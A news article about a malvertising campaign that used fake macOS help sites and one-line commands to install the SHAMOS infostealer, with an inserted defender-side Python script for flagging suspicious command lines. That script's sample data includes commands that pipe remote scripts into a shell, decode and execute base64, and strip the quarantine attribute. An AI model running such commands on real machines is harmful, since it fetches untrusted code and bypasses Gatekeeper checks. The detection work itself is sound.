Beware: Fake macOS Help Websites Are Spreading Dangerous Infostealers!

2025-08-25

Author: Ming

A Deceptive Scheme Uncovered

In a shocking revelation, a sophisticated malvertising effort has been detected, targeting hundreds of organizations with a cunning plan to deploy a variant of the notorious Atomic macOS Stealer (AMOS). This aggressive campaign ran from June to August 2025, successfully luring victims to fake macOS help websites.

The Sinister Mechanics Behind the Attack

Unfortunately, victims were coaxed into executing a malicious one-line installation command, ultimately leading to infections from the SHAMOS variant of the AMOS infostealer. This malware is a creation of the infamous malware-as-a-service group known as Cookie Spider.

Impressive Defense by CrowdStrike

During this treacherous period, top cybersecurity firm CrowdStrike reported blocking attempts by the malvertising campaign that threatened to compromise over 300 environments of its customers. "This campaign highlights the alarming popularity of malicious one-line installation commands among cybercriminals," CrowdStrike remarked in a recent blog post.

Cybercriminals Finding Ways Around Security

The tactics used in this campaign are particularly insidious, enabling hackers to dodge essential Gatekeeper security checks and install the Mach-O executable—exclusively used by macOS—directly onto victims’ devices. This method has previously been exploited by other notorious groups in malicious Homebrew campaigns.

A Global Threat?

CrowdStrike's findings revealed that these deceptive sites popped up in various countries, including the UK, Japan, China, and Canada, among others. Notably, however, there were no reported victims in Russia, as local eCrime forums have restrictions against targeting users within their own borders.

The Deceptive Instructions

These fraudulent help sites presented victims with incorrect instructions for fixing their technical issues, then deceptively led them to execute a harmful one-line command. That command starts a chain reaction: it downloads a file from a suspicious server, which leads to password theft and the installation of the SHAMOS executable.
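As an added, defender-side example that is not part of the original report: a small Python screen over endpoint command-line telemetry that flags the command shapes the article describes, namely a one-line command that fetches a remote payload and pipes it straight into a shell, an inline base64 blob decoded and executed, and commands that strip the quarantine attribute Gatekeeper relies on. The sample command lines, the `example.invalid` hostnames and the rule set are constructed assumptions for illustration, not indicators from the campaign.

```python
import re
from typing import List, Tuple

# Constructed sample of shell-history / EDR command-line telemetry.
# None of these lines come from the campaign; they only mimic its shape.
SAMPLE_COMMANDS = [
    "brew install wget",
    "curl -fsSL https://example.invalid/fix.sh | bash",
    "echo 'ZWNobyBoaQ==' | base64 -d | sh",
    "xattr -d com.apple.quarantine /tmp/helper",
    "ls -la ~/Downloads",
    "wget -qO- http://example.invalid/x | zsh",
]

# A download tool followed by anything up to the next pipe/separator.
DOWNLOADER = r"\b(?:curl|wget)\b[^|;&]*"
# Interpreters a fetched script is typically piped into.
SHELL = r"\b(?:sh|bash|zsh)\b"

# (human-readable reason, compiled pattern). Rules are assumptions, not a
# vendor signature set; tune them against your own baseline before alerting.
RULES: List[Tuple[str, re.Pattern]] = [
    ("remote script piped directly to a shell",
     re.compile(DOWNLOADER + r"\|\s*" + SHELL)),
    ("base64 payload decoded and executed",
     re.compile(r"base64\s+(?:-d|-D|--decode)\b.*\|\s*" + SHELL)),
    ("quarantine attribute removed (Gatekeeper check bypass indicator)",
     re.compile(r"xattr\s+-[a-z]*d[a-z]*\s+com\.apple\.quarantine")),
]


def classify(command: str) -> List[str]:
    """Return the reasons (rule names) that match a single command line."""
    return [name for name, pattern in RULES if pattern.search(command)]


def flag_suspicious(commands) -> List[Tuple[str, List[str]]]:
    """Return (command, reasons) for every command that hits at least one rule."""
    flagged = []
    for cmd in commands:
        hits = classify(cmd)
        if hits:
            flagged.append((cmd, hits))
    return flagged


if __name__ == "__main__":
    for cmd, reasons in flag_suspicious(SAMPLE_COMMANDS):
        print(f"SUSPICIOUS: {cmd!r}")
        for reason in reasons:
            print(f"    - {reason}")
```

The screen is deliberately coarse: `brew install wget` contains a downloader name but no pipe into an interpreter, so it passes, while a legitimate admin stripping a quarantine attribute will still be flagged and needs triage. In practice these rules would feed an alert that also captures the parent process (a terminal launched from a browser download page is the context the article describes) rather than blocking on the pattern alone.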

An Ongoing Threat

Since bringing this campaign to light, CrowdStrike's Counter Adversary Operations team has observed ongoing activity from opportunistic eCrime actors, who continue to exploit malicious GitHub repositories to trick victims into executing commands downloading SHAMOS malware. The firm warns that these cybercriminals are expected to persist in their use of malvertising and one-line installation tactics to disseminate macOS information stealers.